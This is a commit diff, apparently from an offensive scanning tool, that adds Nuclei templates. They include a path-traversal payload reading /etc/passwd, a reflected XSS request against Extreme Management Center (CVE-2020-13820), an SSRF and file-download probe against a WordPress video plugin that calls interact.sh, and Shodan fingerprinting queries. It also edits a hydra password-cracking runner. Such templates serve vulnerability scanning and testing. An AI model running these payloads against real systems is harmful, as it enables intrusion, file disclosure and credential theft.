up PoCs,add new Payload 2022-09-29

GhostTroops · Sep 29, 2022 · 1894757 · 1894757
1 parent dc5aebf
commit 1894757
Show file tree

Hide file tree

Showing 7 changed files with 149 additions and 2 deletions.
diff --git a/config/nuclei-templates/51pwn/pay001.yaml b/config/nuclei-templates/51pwn/pay001.yaml
@@ -16,6 +16,7 @@ requests:
         
     payloads:
       path1:
+        - "/asset////////////////../../../../../../../../etc/passwd"
         - "%00../../../../../../etc/passwd"
         - "%00/etc/passwd%00"
         - "%0a/bin/cat%20/etc/passwd"

diff --git a/config/nuclei-templates/cves/2020/CVE-2020-13820.yaml b/config/nuclei-templates/cves/2020/CVE-2020-13820.yaml
@@ -0,0 +1,45 @@
+id: CVE-2020-13820
+
+info:
+  name: Extreme Management Center 8.4.1.24 - Cross Site Scripting
+  author: tess
+  severity: medium
+  description: |
+    Extreme Management Center 8.4.1.24 allows unauthenticated reflected XSS via a parameter in a GET request.
+  reference:
+    - https://medium.com/@0x00crash/xss-reflected-in-extreme-management-center-8-4-1-24-cve-2020-13820-c6febe951219
+    - https://gtacknowledge.extremenetworks.com/articles/Solution/000051136
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-13820
+    - https://gtacknowledge.extremenetworks.com
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2020-13820
+    cwe-id: CWE-79
+  metadata:
+    shodan-query: title:"Extreme Management Center"
+    verified: "true"
+  tags: cve,cve2020,xss,extremenetworks
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/OneView/view/center?a%27+type%3d+%27text%27+autofocus+onfocus%3d%27alert(document.domain)"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "autofocus onfocus='alert(document.domain)"
+          - "Extreme Management Center"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/config/nuclei-templates/cves/2022/CVE-2022-2633.yaml b/config/nuclei-templates/cves/2022/CVE-2022-2633.yaml
@@ -0,0 +1,36 @@
+id: CVE-2022-2633
+
+info:
+  name: All In One Video Gallery Plugin - Unauthenticated Arbitrary File Download & SSRF vulnerability
+  author: theamanrawat
+  description: |
+    Unauthenticated Arbitrary File Download & SSRF vulnerability in WordPress All In One Video Gallery Plugin (versions <= 2.6.0).
+  reference:
+    - https://wpscan.com/vulnerability/852c257c-929a-4e4e-b85e-064f8dadd994
+    - https://blog.amanrawat.in/2022/09/28/CVE-2022-2633.html
+    - https://wordpress.org/plugins/all-in-one-video-gallery/
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2633
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-2633
+  classification:
+    cve-id: CVE-2022-2633
+  metadata:
+    verified: true
+  tags: cve2022,wp-plugin,unauth,ssrf,wpscan,cve,wordpress,wp,all-in-one-video-gallery
+
+requests:
+  - raw:
+      - |
+        @timeout: 10s
+        GET /index.php/video/?dl={{base64('http://interact.sh/')}} HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Interactsh Server'
+
+      - type: status
+        status:
+          - 200
diff --git a/config/nuclei-templates/exposed-panels/aircube-login.yaml b/config/nuclei-templates/exposed-panels/aircube-login.yaml
@@ -0,0 +1,26 @@
+id: aircube-login
+
+info:
+  name: airCube Login
+  author: DhiyaneshDk
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.favicon.hash:1249285083
+  tags: panel,aircube,ubiquiti
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>airCube</title>'
+
+      - type: status
+        status:
+          - 200
diff --git a/config/nuclei-templates/technologies/zend-server-test-page.yaml b/config/nuclei-templates/technologies/zend-server-test-page.yaml
@@ -0,0 +1,31 @@
+id: zend-server-test-page
+
+info:
+  name: Zend Server Test Page
+  author: DhiyaneshDk
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: title:"Zend Server Test Page"
+  tags: tech,zend
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>Zend Server Test Page</title>'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/config/nuclei-templates/token-spray/api-screenshotapi.yaml b/config/nuclei-templates/token-spray/api-screenshotapi.yaml
@@ -2,7 +2,7 @@ id: api-screenshotapi
 
 info:
   name: ScreenshotAPI API Test
-  author: daffainfo
+  author: daffainfo,geeknik
   severity: info
   description: Create pixel-perfect website screenshots
   reference:
@@ -16,10 +16,18 @@ requests:
     path:
       - "https://shot.screenshotapi.net/screenshot?token={{token}}&url=https://example.com"
 
+    matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
           - 'screenshot'
           - 'url'
         condition: and
+
+      - type: status
+        status:
+          - 403
+          - 401
+          - 400
+        negative: true
diff --git a/pkg/hydra/runner.go b/pkg/hydra/runner.go
@@ -45,7 +45,7 @@ func Start(IPAddr string, Port int, Protocol string) {
 		if nil != &out && "" != out.Protocol && out.IPAddr != "" && "" != out.Auth.Username {
 			util.SendAData[AuthInfo](fmt.Sprintf("%s:%d", out.IPAddr, out.Port), []AuthInfo{out}, util.Hydra)
 			data, _ := json.Marshal(out)
-			fmt.Println("成功密码破解：", aurora.BrightRed(string(data)))
+			fmt.Println("Successful password cracking：", aurora.BrightRed(string(data)))
 		}
 	}
 	log.Printf("\n[hydra]-> %v:%v [ %v ] 暴力破解 Finish\n", IPAddr, Port, Protocol)